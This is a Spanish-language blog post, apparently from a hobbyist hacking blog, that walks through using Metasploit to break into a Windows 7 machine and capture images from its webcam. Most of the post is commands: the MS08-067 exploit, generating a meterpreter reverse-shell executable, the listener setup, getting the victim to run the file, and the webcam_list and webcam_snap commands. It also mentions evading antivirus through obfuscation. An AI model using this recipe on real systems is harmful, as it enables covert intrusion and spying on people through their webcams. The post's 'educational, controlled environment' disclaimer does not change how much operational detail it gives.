HACKER ANGELWHITE GALC

jueves, 17 de abril de 2014

USANDO METEPRETER PARA INGRESAR A UNA WEB CAM

Ya estoy empezando a hacer prácticas más avanzadas, así que en este post voy vamos a utilizar metasploit para tener acceso a una máquina con Windows 7.  Generaremos un archivo que se tendrá que ejecutar en la máquina víctima.
Esta manera es la que yo he encontrado más fácil, después de ver algunos videos que hay por la red (sobretodo en otros idiomas).
Lo primero es ejecutar metasploit.
En un terminal ejecutamos “msfconsole”.
imagen1
Una vez que se carga, tecleamos “show exploits” donde nos muestra los exploits que se encuentran.  Una vez que localizamos el que nos interesa ( WINDOWS/SMB/MS08_067_NETAPI), copiamos la ruta y, en el terminal ponemos lo siguiente:
imagen2
imagen3
En este punto, tecleamos “show payloads” para ver los payloads”.
Una vez localizado el que buscamos ( Windows/meterpreter/reverse_tcp), abrimos otro terminal y ponemos lo siguiente:
“Msfpayload Windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=4444 x > /usr/prueba.exe”
imagen4
donde una que vez termine, nos vamos a la carpeta usr y encontraremos el archivo ‘prueba.exe”.
imagen5
Cogemos este archivo y hay que conseguir que lo ejecuten en la máquina víctima (en este caso, es un entorno de Red), que lo conseguí porque la máquina es mia. J
Una vez que está en la victima el archivo, nos vamos a la terminal donde usamos el exploit y ejecutamos “use multi/handler” para permanecer a la escucha.
imagen6
Definimos la IP del atacante con “set LHOST ipatacante” y “set LPORT puerto”.
Ponemos “exploit” y se ejecuta. Se queda  a la “escucha”, esperando que el payload se ejecute en la máquina victima y se conecte.
Una vez que lo ejecutan, nos aparece en el terminal esto:
imagen7
Ponemos “Shell” y ya estamos en el prompt del ordenador infectado.
Lo que me llamó la atención fue el  acceder a la webcam de la victima.
Para ello, ponemos “exit” para volver al prompt de “meterpreter” y ponemos “webcam_list” para acceder a la webcam disponibles en el equipo.
Posteriormente, ponemos “webcam_snap” y nos realizará una captura de la webcam en ese momento.
Y la captura…..
camiseta
Eso es todo amigos…..un saludo…y recordad que esto es con fines educativos….hacedlo en un entorno controlado. Yo quite el AV para evitar pasos, pero en la prueba que hice usando SET en el que ofuscaba no me lo detectaba.


 Gracias por su post  amigo  
David
@darksh4m4n

No hay comentarios:

Publicar un comentario